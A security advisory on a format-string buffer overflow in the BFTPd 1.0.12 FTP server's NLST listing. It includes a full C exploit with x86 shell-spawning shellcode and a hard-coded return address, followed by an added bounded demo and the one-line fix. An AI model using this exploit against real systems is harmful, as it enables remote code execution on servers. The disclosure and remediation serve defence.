[ SOURCE: http://www.secureroot.com/security/advisories/9761914935.html ]

Malformed vsprintf in BFTPd allows execution of arbitrary code
------------------------------------------------------------------------

SUMMARY

BFTPd is a Linux FTP server with chroot and setreuid functionality. The latest version of BFTPd has a security problem when the NLST command is used to list a file whose name contains a format string. The vulnerability allows remote attackers to overflow an internal buffer and execute arbitrary code.

DETAILS

Vulnerable systems:
 * BFTPd 1.0.12

There is a malformed call to vsprintf in BFTPd. The relevant vulnerable function is sendstrf:

    int sendstrf(int s, char *format, ...)
    {
        ....
        vsprintf(buffer, format, val);

When the function is called from an NLST command, the directory entry name is passed to sendstrf as the format string rather than as an argument, so vsprintf interprets any % conversions in the filename:

        else foo = 1;
        sendstrf(s, entry->d_name);
    }

Because the name is treated as a format string, a filename containing a conversion such as %.260x makes vsprintf write far more bytes than the name itself is long. vsprintf has no length limit, so the output overflows the fixed-size buffer in sendstrf and can be used to execute arbitrary code. Anyone who can create a file in a directory that the server will list (the exploit below does it locally with touch) can trigger the bug.

Exploit:

    /*
     * Creates a filename to exploit the bug in bftpd 1.0.12.
     * Create the file, cwd in the shell directory and NLST the file's
     * directory (sh is executed in the working dir because it is not
     * possible to insert a / in the filename).
     *
     * hints by |CyRaX| & Cthulhu
     * coded by asynchro
     * www.pkcrew.org
     */

    #include <stdlib.h>
    #include <string.h>

    #define BUFSIZE 512
    #define NOP 124

    int main(void)
    {
        int i;
        char *buff;
        char nop = 0x90;
        /* return address written over the saved EIP (hard-coded stack address) */
        char addr[] = "\xd4\xf9\xff\xbf";
        /* %.260x pads the vsprintf output to 260 bytes before the addresses */
        char command[] = "touch %.260x";
        char shellcode[] =
            "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
            "\x80\xe8\xdc\xff\xff\xffsh";

        buff = (char *) malloc(BUFSIZE);
        memset(buff, 0x0, BUFSIZE);
        memcpy(buff, command, sizeof(command));
        strncat(buff, addr, 4);
        strncat(buff, addr, 4);
        for (i = 0; i < NOP; i++) {
            strncat(buff, &nop, 1);
        }
        strncat(buff, shellcode, strlen(shellcode));
        /* creates the malicious filename in the current directory */
        system(buff);
        return 0;
    }

ADDITIONAL INFORMATION

The information has been provided by asynchro.
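The following added example is not part of the advisory or of BFTPd; it reproduces the sendstrf call pattern in a bounded form so the format-string behaviour can be observed safely. list_entry_vulnerable passes the entry name as the format exactly as the NLST code does, list_entry_fixed passes it as a "%s" argument, and bytes_written_by measures how long the output of an attacker-chosen name would be. The functions, the 64-byte buffer and the filenames are constructed for the demonstration; vsnprintf is used instead of vsprintf so that the demo itself cannot overflow, and bytes_written_by supplies one dummy integer argument so that a single %x conversion is well-defined here (in the real server no argument exists and vsprintf consumes whatever is on the stack).

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Same shape as BFTPd's sendstrf(): a printf-style function that formats
   into a caller buffer. Bounded with vsnprintf for the demonstration.
   Returns the number of bytes the full output would occupy. */
static int fmt_into(char *out, size_t outlen, const char *format, ...)
{
    va_list ap;
    int n;

    va_start(ap, format);
    n = vsnprintf(out, outlen, format, ap);
    va_end(ap);
    return n;
}

/* Vulnerable pattern: the directory entry name IS the format string, as in
   sendstrf(s, entry->d_name). Any %-conversion in the name is interpreted. */
int list_entry_vulnerable(char *out, size_t outlen, const char *d_name)
{
    return fmt_into(out, outlen, d_name);
}

/* Fixed pattern: a constant format, the name is only an argument and is
   copied verbatim regardless of what characters it contains. */
int list_entry_fixed(char *out, size_t outlen, const char *d_name)
{
    return fmt_into(out, outlen, "%s", d_name);
}

/* How many bytes an attacker-chosen name produces when used as a format.
   The dummy 0 argument keeps one %x conversion well-defined in this demo. */
int bytes_written_by(const char *attacker_name)
{
    return fmt_into(NULL, 0, attacker_name, 0);
}

int main(void)
{
    char buf[64];
    /* constructed filenames: one benign with a literal percent, one from the exploit */
    const char *benign = "50%%done";
    const char *padded = "%.260x";

    list_entry_vulnerable(buf, sizeof buf, benign);
    printf("vulnerable: \"%s\" -> \"%s\"\n", benign, buf);
    list_entry_fixed(buf, sizeof buf, benign);
    printf("fixed:      \"%s\" -> \"%s\"\n", benign, buf);

    /* a 6-character name expands to 260 bytes of output: this is what
       overruns a buffer sized for filenames when vsprintf is unbounded */
    printf("%zu-byte name \"%s\" formats to %d bytes\n",
           strlen(padded), padded, bytes_written_by(padded));
    return 0;
}
```

The expansion measured by bytes_written_by is the whole attack: a filename is at most a few hundred bytes on disk, but %.260x alone produces 260 bytes of output before the addresses, NOP sled and shellcode that follow it in the name, and vsprintf will write all of it past the end of its buffer. The fix is the one-token change from sendstrf(s, entry->d_name) to sendstrf(s, "%s", entry->d_name), and sendstrf itself should use vsnprintf with the buffer size rather than vsprintf.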